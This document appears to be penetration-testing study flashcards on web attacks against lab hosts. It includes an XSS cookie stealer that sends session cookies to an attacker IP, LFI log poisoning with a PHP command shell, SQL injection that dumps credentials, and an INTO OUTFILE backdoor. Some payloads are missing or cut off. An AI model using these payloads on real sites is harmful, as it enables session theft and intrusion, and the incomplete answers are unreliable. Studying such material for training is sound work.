Web Application Attacks

Question 1

What is the first thing you should do before launching an attack on a web server?

Answer 1

Discover the technology stack in use:

• Programming language and frameworks
• Web server software
• Database software
• Server operating system

Question 2

What are common web site enumeration steps?

Answer 2

1. Inspect URLs: file extensions reveal programming language, such as .php, .jsp, .do, .html
2. Inspect Page Content: debugger tools may display JavaScript frameworks, hidden input fields, comments, client-side controls within HTML, JavaScript
3. View Response Headers: in Firefox the Network tab of the Web Developer menu
4. Inspecting Site Maps: robots.txt, sitemap.xml; use curl to get
5. Locate Administrator Consoles

Question 3

How would you use ‘curl’ to get robots.txt for google.com?

Answer 3

curl https://www.google.com/robots.txt

Question 4

What is the open source web server scanner?

Answer 4

Nikto

Question 5

How would you run Nikto against megacorpone.com for 30 seconds?

Answer 5

nikto -host=http://www.megacorpone.com -maxtime=30s

Question 6

How can you use Intruder to brute force a phpMyAdmin login page if there is a unique ‘set_session’ value and a ‘token’ value required for each login?

Answer 6

1. In Positions Tab: select phypMyAdmin, set_session, password, and token values
2. Select “Pitchfork” as the attack type
3. Options Tab > Grep Extract > Add: define ‘grep’ extraction to begin after _session” value=” and end at “ />Log (this will grab the ‘set_session’ string)
4. Add another Grep Extract: start grep extraction after en” value=” and end at “ />\n\n (this will grab the token value)
5. Payloads Tab: for Payload set 1 is for the phpMyAdmin session cookie; set Payload Type to “Recursive Grep” and select the first Recursive Grep option set above
6. Payloads Tab: Payload set 2 is for “set_session”; it needs to match the value of the “phpMyAdmin cookie”, so it is the same value as option 1
7. Payloads Tab: Payload set 3 is for “password” and use a simple list of passwords
8. Payloads Tab: Payload set 4 is for the token value; use the 2nd “Recursive Grep” option

Question 7

What would be your next action to take after successfully logging into phpMyAdmin console?

Answer 7

Run database SQL queries against user table to find credentials

Question 8

What allows XSS to take place?

Answer 8

Web application allowing unsanitized data, thereby allowing attackers to inject and potentially execute malicious code.

Question 9

Stored XSS

Answer 9

• aka Persistent XSS
• occurs when the exploit payload stored in a database or otherwise cached by a server
• the web application then retrieves this payload and displays it to anyone that views a vulnerable page
• a single stored XSS can therefore attack anyone that visits the page

Question 10

Reflected XSS

Answer 10

• usually include the payload in a crafted request or link
• the web application takes this value and places it into the page content
• this variant only attacks the person submitting the request or viewing the link
• often occur in search fields and results, as well as anywhere user input is included in error messages

Question 11

URL Encoding

Answer 11

• sometimes referred to as percent encoding
• used to convert non-ASCII characters in URLs
• Example: converting ‘space’ to %20

Question 12

HTML Encoding

Answer 12

• used to display characters that normally have special meaning, like tag elements
• Example: &lt, is the character reference for “

Question 13

What is a simple way to see if a web page is sanitizing data, or not?

Answer 13

• if there is a comment posting page, like for a blog post, you can enter ‘hello “ ; < > ‘ and see if the characters are posted as they are
• If the characters are posted as is, and not HTML encoded, the site does not sanitize user input

Question 14

What is a stealthy alternative to a XSS redirect?

Answer 14

• inject an invisible iframe into our XSS payload
• this will embed the file “report” into the HTML file
• once this payload has been submitted, any user that visits the page will connect back to our attack machine

Question 15

What are the two Cookie flags that are of most interest to an attacker?

Answer 15

• Secure

- HttpOnly

Question 16

What does the Secure flag in a Cookie do?

Answer 16

• instructs the browser to only send the cookie over encrypted connections, such as HTTPS
• this protects the Cookie from being sent in cleartext and captured over the network

Question 17

What does the HttpOnly flag in a Cookie do?

Answer 17

• instructs the browser to deny JavaScript access to the cookie
• if the HttpOnly flag is NOT set, we can use an XSS payload to steal the cookie

Question 18

How can the capture a victim’s PHPSESSID cookie?

Answer 18

• We can use JavaScript to read the value of the cookie and append it to an image URL that links back to our attack machine.
• The browser will read the image tag and send a GET request to our attack system with the victim’s cookie as part of the URL query string.
• To implement our cookie stealer, we need to modify our XSS payload as follows:
• • new Image().src=”http://10.11.0.4/cool.jpg?output= “+document.cookie;
• When a victim visits the page with the application with this embedded script, their browser makes a connection to the 10.11.0.4 attacking machine and we receive:
• • GET /cool.jpg?output=PHPSESSID=ua19spm8i3t1l9acl9m2tfi76 HTTP/1.1
• We can then use Cookie-Editor in Firefox to add the stolen cookie

Question 19

Directory Traversal Vulnerabilities

Answer 19

• aka Path Traversal
• allow attackers to gain unauthorized access to files within an application or files normally not accessible through a web interface, such as those outside of the web root directory
• occurs when input is poorly validated, granting an attacker the ability to manipulate file paths with “../” or “.." characters

Question 20

If we see the end of a URL containing “/menu?file=current_menu.php”…how should we attack this for Directory Traversal Vulnerabilities?

Answer 20

• First, change the “file” value to something arbitrary like “file=old.php”
• If there is an error message with a full file path, then it is likely vulnerable
• Next, try file=c:\windows\system32\drivers\etc\hosts

Question 21

What is a file inclusion vulnerability?

Answer 21

• allows an attacker to include a file into the application’s running code
• Local File Inclusion (LFI) occurs when the included file is loaded from the same web server
• Remote File Inclusion (RFI) occurs when the included file is loaded from an external source.
• This is typically found in PHP applications

Question 22

In order to exploit a file inclusion vulnerability, we is required?

Answer 22

• ability to execute code

- ability to write our shell payload somewhere

Question 23

How can you exploit LFI using Log Files?

Answer 23

• We can try to inject code onto the server through log file poisoning
• Most application servers will log all URLs that are requested
• We can take advantage of this by submitting a request that includes PHP code
• Once the request is logged, we can use the log file in our LFI payload.

Question 24

Example LFI using Log File Poisoning?

Answer 24

1. Start NC: nc -nv 10.11.0.22 80
2. Send PHP Payload: echo ‘<pre>’ . shell_exec($_GET[‘cmd’]) . ‘</pre>;?>
   * ** We get a 400 Bad Request error…but the request has been logged, so we can now do LFI Code Execution***
3. Exploit LFI Vulnerability: http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
   * ** Once the URL is sent to the web server, the output will be the ‘access.log’ file and then ‘ipconfig’ executed

Question 25

How can you exploit LFI with PHP Wrappers; provide an example?

Answer 25

• we can use the ‘data’ wrapper to embed inline data as part of the URL with plaintext or base64 encoded data
• this wrapper provides us with an alternative payload when we cannot poison a local file with PHP code
• we start with “data:” followed by the type of data…in this case “text/plain”
• we follow this with a comma to mark the start of the contents, in this case “hello world”
• • http://10.11.0.22/menu.php?file=data:text/plain,hello world

Question 26

Example: execute code by exploiting LFI with PHP Wrappers?

Answer 26

http://10.11.0.22/menu.php?file=data:text/plain,

Question 27

Example: What is a basic SQL Injection attack?

Answer 27

• • select * from users where name = ‘tom’ or 1=1;#’ and password = ‘jones’;
• ** The ‘#’ is a comment marker in MySQL/MariaDB, and effectively removes the rest of the statement ***

Question 28

Example: What is a basic SQL Injection attack where we limit the returned values to 1?

Answer 28

– select * from users where name =’tom’ or 1=1 LIMIT 1;#

Question 29

What are the steps of Enumerating a Database via SQL Injection Attack in the URL?

Answer 29

1. Column number enumeration
2. Understand the layout of the output
3. Extract data from the database

Question 30

How can you verify that the page /debug.php is vulnerable to SQL Injection?

Answer 30

1. http://10.11.0.22/debug.php?id=’

2. If we get an error message regarding SQL syntax, then we know that we have SQL Injection

Question 31

Given a page /degug.php that is vulnerable to SQL Injection, how do you enumerate the number of Columns in a table?

Answer 31

1. http://10.11.0.22/debug.php?id=1 order by 1
   - - This query instructs the database to sort the results based on the values in the first column.
   - - If there is at least one column in the query, the query is valid and the page with render without errors.
   - - We can submit multiple queries, incrementing the ‘order by’ clause each time until the query generates an error, indicating that the maximum number of columns returned by the query in question has been exceeded.
2. Send to Repeater and increment the ‘order by’ clause by 1 until you receive an error in the response

Question 32

If we have enumerated the number of columns in a table, how can we find out more about each column?

Answer 32

• • We can use the UNION statement to get an idea of which columns are being displayed on our screen
• • This new select state will return one row with three columns with values of 1, 2, and 3.
• • /debug.php?id=1 union all select 1, 2, 3

Question 33

If we have enumerated the number of columns in a table, how can we find out what database software is being used?

Answer 33

– /debug.php?id=1 union all select 1, 2, @@version

Question 34

If we have enumerated the number of columns in a table, how can we find out what database user is being used?

Answer 34

– /debug.php?id =1 union all select 1, 2, user()

Question 35

If we have enumerated the number of columns in a table, how can we find out additional information such as Table names?

Answer 35

– /debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

Question 36

If we have discovered a table named USERS, how can we find out the names of columns in this table?

Answer 36

– /debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name=’users’

Question 37

From the table USERS, we discover columns named USERNAME and PASSWORD. How can we display information from these columns?

Answer 37

– /debug.php?id=1 union all select 1, username, password from users

Question 38

How can SQL Injection be leveraged for Code Execution?

Answer 38

– /debug.php?id=1 union all select 1, 2, load_file(‘C:/Windows/System32/drivers/etc/hosts’)

Question 39

How can SQL Injection be leveraged to create a malicious PHP file within the server’s web root?

Answer 39

• -/debug.php?id=1 union all select 1, 2, “” into OUTFILE ‘c:/xampp/htdocs/backdoor.php’
• ** This command produces an error message but this doesn’t mean the file creation was unsuccessful
• ** Access the newly created ‘backdoor.php’ with a ‘cmd’ parameter such as ‘ipconfig’
• • /backdoor.php?cmd=ipconfig